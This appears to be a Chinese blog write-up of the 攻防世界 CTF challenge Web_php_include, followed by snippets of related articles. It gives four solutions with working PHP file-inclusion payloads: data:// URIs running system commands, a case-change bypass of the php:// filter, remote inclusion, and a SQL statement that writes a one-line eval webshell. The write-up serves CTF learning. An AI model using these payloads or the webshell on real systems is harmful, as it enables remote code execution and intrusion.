php攻防,攻防世界(Web_php_include)

最新推荐文章于 2023-06-20 14:00:00 发布
最新推荐文章于 2023-06-20 14:00:00 发布
阅读量96 收藏
点赞数
文章标签: php攻防

题目叙述

题目场景如下:

属于文件包含漏洞

解决

方法一

0x00

通过代码审计可以知道,存在文件包含漏洞,并且对伪协议php://进行了过滤。

发现根目录下存在phpinfo

观察phpinfo发现如下:

这两个都为on

所以我们就可以使用data://伪协议

0x01

payload如下:

- ?page=data://text/plain,<?php system("ls")?>

- ?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCJscyIpPz4= #base64编码

- ?page=data:text/plain,<?php system("ls")?>

- ?page=data:text/plain;base64,PD9waHAgc3lzdGVtKCJscyIpPz4= #base64编码

上面的payload就可以实现命令执行了

找了半天发现flag在fl4gisisish3r3.php文件中

使用如下payload就可以获取flag了

?page=data://text/plain,<?php system("cat fl4gisisish3r3.php")?>

使用该命令获取的flag被隐藏了,直接在web界面找不到,可以通过查看网页源代码查看

方法二

0x00

代码审计可知,存在文件包含漏洞。

0x01

这里我们借助了hello参数

hello接收到数据直接输出

所以就可以构造如下payload:

?page=http://127.0.0.1/index.php/?hello=<?php system("ls")?>

但是什么都没得到,具体什么情况我也不清楚,继续构造

?page=http://127.0.0.1/index.php/?hello=<?system ("ls")?>

此处也可以执行命令了

这次得到了如下结果:

然后可以用如下

?page=http://127.0.0.1/index.php/?hello=<?show_source ("fl4gisisish3r3.php");?>

得到flag

方法三

0x00

代码审计,可得存在文件包含漏洞,并且过滤php://伪协议,但是由代码可得我们可以进行绕过。

0x01

大小写绕过

?page=Php://filter/read=convert.base64-encode/resource=fl4gisisish3r3.php

对得到的结果进行base64解码即可

方法四

0x00

扫描目录

得到如下结果

0x01

进入后台密码为空

查询是否可以写入shell

可以写入

sql执行如下语句

select "<?php eval(@$_POST['c']); ?>"into outfile '/tmp/shell.php'

连接

就可以获得shell,然后就可以去获取flag了。

宝图2borne
关注
攻防世界(web篇)---Web_php_include
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
06-07 3605
hello传值 phpmyadmin写马 phpmyadmin变量secure_file_priv值为空,说明可以写入一句话木马 传🐎成功 测试🐎php://input 可以访问请求的原始数据的只读流, 将post请求中的数据作为PHP代码执行利用该方法,我们可以直接写入php文件,输入file=php://input,然后使用burp抓包,写入php代码: file://协议 用于访问本地文件系统,不受allow_url_fopen与allow_url_include的影响即file:// [文..
【网络安全 | CTF】攻防世界 Web_php_includephp伪协议|data伪协议|file伪协议】
等风来
05-22 9934
PHP 语言中一个重要的文件包含机制,可以将一个 PHP 文件包含到另一个 PHP 脚本文件中。该机制通常用于代码复用和模块化开发,在不同的 PHP 文件之间实现函数和类等代码的共享。file 伪协议用于访问本地文件系统中的文件,可以在 web 页面中链接到本地文件,或者读取本地文件中的数据。PHP 伪协议是一种特殊的 URI 协议,可以绕过通常的协议限制,直接访问本地文件和执行 PHP 代码。函数,该函数返回当前工作目录的绝对路径。函数,该函数返回当前执行的 PHP 脚本所在位置的绝对路径。
AWD攻防比赛 PHP WAF
09-07
AWD攻防比赛 PHP WAF 超强waf,防读flag 比赛用基本可以完美防住
PHP常见漏洞与编码安全-PHP攻防入门-学习笔记
君陌
12-07 605
一、在地址栏直接输入目标地址跳转。如在未登录的情况下直接访问需要登录才能显示的目标页面 办法:采用session会话技术,在目标页面开启session验证,session中没有存储对应的用户信息代表用户未登录。用户登录时存储相应信息到session中。 二、跨站脚本攻击(Cross Site Scripting,XSS) 是一种经常出现在Web应用程序中的计算安全漏洞,是由于Web
PHP攻防环境搭建
weixin_46476861的博客
12-19 144
PHPstudy一键搭建 双击安装 出现如下界面就ok 出现这个页面就没问题 四个文件拖进来,phpcms那个文件如下下图 查一下ip地址 php网站的端口号在这里 可以看到默认端口是80,网站根目录是www,如果Apache是红色的,就说明可能是端口冲突了,换一个就行 看看ip地址页面,这个php探针就是这个l.php 输入如下,回车 按照提示去找这个connect-i 可以看到配置的文件在include函数这里,去找这个文件 打开这个文件 加个密码roo
PHP常见攻击以及防御
sinat_18226787的博客
03-12 288
一. XSS(cross site script)恶意攻击者往Web页面里插入恶意html代码 防御: 使用htmlspecialchars函数将特殊字符转换成HTML编码,过滤输出的变量 二. CSRF(Cross-site request forgery)通过伪装来自受信任用户的请求来利用受信任的网站。 防御:采用类似随即码或者令牌的形式,让用户操作唯一性。 (每次用户登录网...
PHP2攻防世界详解
qq_53003652的博客
03-30 269
其实,只要不用php等已经在服务器中注册过的MIME类型为文件即可,但为了国际通用,所以才用了phps文件类型。$_GET本身自带一次urldecode,代码里又进行了一次urldecode,所以要对id赋的值admin进行两次url编码,编码后为%25%36%31%25%36%34%25%36%64%25%36%39%25%36%65。查看网页源代码,也是什么都没有,在URL后加index.php,也是什么都没有,这时,在URL后加index.phps,可以发现有东西出来了。此时即可获取flag。
攻防世界WEB——Web_php_include
Zeker62的博客
08-16 470
借鉴了别人的博客:https://www.cnblogs.com/xhds/p/12218471.html但是还是要自己总结一下 源代码是这样的 <?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page); } include($page); ?> 这里有几个函
攻防世界 Web_php_include(include)
Haowill的博客
04-15 1010
Web_php_include 一拿到这道题目看到include,我觉得像是一道文件包含漏洞的题目,这种漏洞一般做法有两种 1.包含的文件在本地上传一个webshell去,该webshell在本地,运行webshell就可以用菜刀去连上 2.如果包含的文件不本地,是远程的网上的文件,那么我们可以黑它远程的那个文件。这样也可以getshell。 拿到题目 很有意思这个题目给的是源代码。 <?...
攻防世界web_php_include
03-16
攻防世界中的 web_php_include 是一种漏洞,它指的是在 PHP 程序中使用 include 或 require 语句加载文件时可能存在的安全问题。这种漏洞可能导致远程代码执行攻击,允许攻击者在服务器上执行任意代码。为了防止这种...
Web攻防系列教程之浅析PHP命令注入攻击
05-27
Web攻防系列教程之浅析PHP命令注入攻击
PHP 安全攻防,实体转义
houyanhua1的专栏
12-05 683
一、恶意攻击 Post灌水:  解决:加入隐藏字段   验证码。验证码不显示的原因:1.编码:utf-8;  2. header('Content-type:image/png'); header头前面不允许有空格,在所有两端不能有多余的空格。 二、Sql注入 Post请求:表单中输入特殊字符 如:单引号。  解决:1.加密,md5。  2.转义单引号:站在php的角度用 addsla
攻防世界-php_rce详解
热门推荐
Mr_helloword的博客
08-10 1万+
php_rce 进入后发现是一个php框架,根据题目php-rce远程命令执行,我们百度一下这个版本有什么漏洞
PHP网站常见一些安全漏洞及防御方法_php
最新发布
Karka_的博客
06-20 509
一、常见PHP网站安全漏洞对于PHP的漏洞,目前常见的漏洞有五种。分别是Session文件漏洞、SQL注入漏洞、脚本命令执行漏洞、全局变量漏洞和文件漏洞。这里分别对这些漏洞进行简要的介绍。1、session文件漏洞Session攻击是黑客最常用到的攻击手段之一。当一个用户访问某一个网站时,为了免客户每进人一个页面都要输人账号和密码,PHP设置了Session和Cookie用于方便用户的使用和访向。2、SQL注入漏洞。
攻防世界CTF —— PHP本地文件包含漏洞解题思路
weixin_47610939的博客
07-27 4178
攻防世界的CTF web类题目,关于php本地文件包含漏洞的解题思路
攻防世界Web_php_include
qq_58970968的博客
10-31 149
先代码审计一下发现,这是一个文件包含,需要绕过while循环语句,可以用伪协议,伪协议知识参考php伪协议 - single-dog - 博客园
攻防世界WEB进阶之PHP2
harry_c的博客
07-31 6361
攻防世界WEB进阶之PHP2第一步:分析第二步:实操第三步:答案 难度系数: 1星 题目来源: 暂无 题目描述:暂无 第一步:分析 根据题目,没有给出任何信息,直接是一个场景,点击打开场景页面我们发现是一串文字:Can you anthenticate to this website? 第二步:实操 首先想到尝试index.php,未果。再尝试index.phps,成功发现了代码泄露。 <?...
PHP渗透测试题目笔记
Zeker62的博客
02-10 5587
最简单反序列化漏洞陷阱题 PHP反序列化漏洞PHP魔术方法执行顺序CTFHub-2020网鼎杯AreUSerialz攻防世界:unserialize3题目解析攻防世界PHP2 最简单反序列化漏洞 简单实例,如下是一串简单的PHP代码,index.php里面包含了flag.php 这个文件 <?php // 关闭错误报告 error_reporting(0); include "flag.php"; $key="020202"; $str=$_GET['str']; if(unserializ
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值